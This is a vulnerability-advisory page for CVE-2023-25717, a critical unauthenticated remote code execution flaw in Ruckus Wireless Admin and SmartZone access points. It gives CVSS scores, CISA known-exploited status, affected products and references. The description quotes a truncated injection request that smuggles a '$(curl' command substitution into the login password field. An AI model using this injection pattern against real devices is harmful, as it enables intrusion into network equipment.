CVE-2023-25717

CRITICAL CISA KEV
Published Feb 13, 20233y ago · Modified Jun 17, 20262w ago
9.8 CVSS 3.1
Critical
Find Similar
Published Feb 13, 2023 3y ago
Last Modified Jun 17, 2026 2w ago
KEV Listed May 12, 2023 3y ago
KEV Due Jun 2, 2023 1125d overdue

Description

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

CVSS Details

Base Score
9.8
Exploitability
3.9
Impact
5.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector Network
Attack Complexity Low
Privileges Required None
User Interaction None
Scope Unchanged
Confidentiality High
Integrity High
Availability High

Threat Intelligence

CISA Known Exploited Overdue 1125d
Added
May 12, 2023
Due
Jun 2, 2023

Apply updates per vendor instructions or disconnect product if it is end-of-life.

Exploit & Patch Status
Actively Exploited (KEV)
Patch Available

Weaknesses 1

CWE-94 Improper Control of Generation of Code (Code Injection) Injection

Affected Products 103

VendorProductVersionRange
ruckuswirelessruckus_wireless_admin* ≤10.4
ruckuswirelesssmartzone_ap* <6.1.0.0.9240
ruckuswirelesse510*any
ruckuswirelessh320*any
ruckuswirelessh350*any
ruckuswirelessh510*any
ruckuswirelessh550*any
ruckuswirelessm510*any
ruckuswirelessr310*any
ruckuswirelessr320*any
ruckuswirelessr350*any
ruckuswirelessr510*any
ruckuswirelessr550*any
ruckuswirelessr610*any
ruckuswirelessr650*any
ruckuswirelessr710*any
ruckuswirelessr720*any
ruckuswirelessr730*any
ruckuswirelessr750*any
ruckuswirelessr760*any
ruckuswirelessr850*any
ruckuswirelesssz-144*any
ruckuswirelesssz100*any
ruckuswirelesssz300*any
ruckuswirelesst310c*any
ruckuswirelesst310d*any
ruckuswirelesst310n*any
ruckuswirelesst310s*any
ruckuswirelesst350c*any
ruckuswirelesst350d*any
ruckuswirelesst350se*any
ruckuswirelesst610*any
ruckuswirelesst710*any
ruckuswirelesst710s*any
ruckuswirelesst750*any
ruckuswirelesst750se*any
ruckuswirelesst811-cm*any
ruckuswirelessruckus_wireless_admin* ≤10.4
ruckuswirelesssmartzone_ap* <5.2.2.0.2064
ruckuswirelesse510*any
ruckuswirelessh320*any
ruckuswirelessh510*any
ruckuswirelessm510*any
ruckuswirelessr310*any
ruckuswirelessr320*any
ruckuswirelessr500*any
ruckuswirelessr510*any
ruckuswirelessr550*any
ruckuswirelessr600*any
ruckuswirelessr610*any
ruckuswirelessr650*any
ruckuswirelessr710*any
ruckuswirelessr720*any
ruckuswirelessr730*any
ruckuswirelessr750*any
ruckuswirelessr850*any
ruckuswirelesst300*any
ruckuswirelesst301n*any
ruckuswirelesst301s*any
ruckuswirelesst310c*any
ruckuswirelesst310d*any
ruckuswirelesst310n*any
ruckuswirelesst310s*any
ruckuswirelesst504*any
ruckuswirelesst610*any
ruckuswirelesst710*any
ruckuswirelesst710s*any
ruckuswirelesst750*any
ruckuswirelesst750se*any
ruckuswirelesst811-cm*any
ruckuswirelessruckus_wireless_admin* ≤10.4
ruckuswirelesssmartzone_ap* <3.6.2.0.795
ruckuswirelessh500*any
ruckuswirelessr300*any
ruckuswirelessr700*any
ruckuswirelessruckus_wireless_admin* ≤10.4
ruckuswirelesssmartzone_ap* <6.1.1.0.1274
ruckuswirelessr560*any
ruckuswirelessruckus_wireless_admin* ≤10.4
commscoperuckus_smartzone_firmware* <5.2.1.3
ruckuswirelesssz-144*any
ruckuswirelesssz300*any
ruckuswirelessruckus_wireless_admin* ≤10.4
commscoperuckus_smartzone_firmware6.1.0.0.935any
ruckuswirelesssz-144*any
ruckuswirelesssz100*any
ruckuswirelesssz300*any
ruckuswirelessruckus_wireless_admin* ≤10.4
ruckuswirelessm510-jp*any
ruckuswirelessp300*any
ruckuswirelessq410*any
ruckuswirelessq710*any
ruckuswirelessq910*any
ruckuswirelesst811-cm\(non-spf\)*any
ruckuswirelesszd1000*any
ruckuswirelesszd1100*any
ruckuswirelesszd1200*any
ruckuswirelesszd3000*any
ruckuswirelesszd5000*any
ruckuswirelessruckus_wireless_admin* ≤10.4
commscoperuckus_smartzone_firmware* <5.2.1.3.1695
ruckuswirelesssz-144-federal*any
ruckuswirelesssz300-federal*any

References 3

  • cybir.com https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
    ExploitThird Party Advisory
  • support.ruckuswireless.com https://support.ruckuswireless.com/security_bulletins/315
    PatchProductVendor Advisory
  • cisa.gov https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717
    US Government Resource

Remediation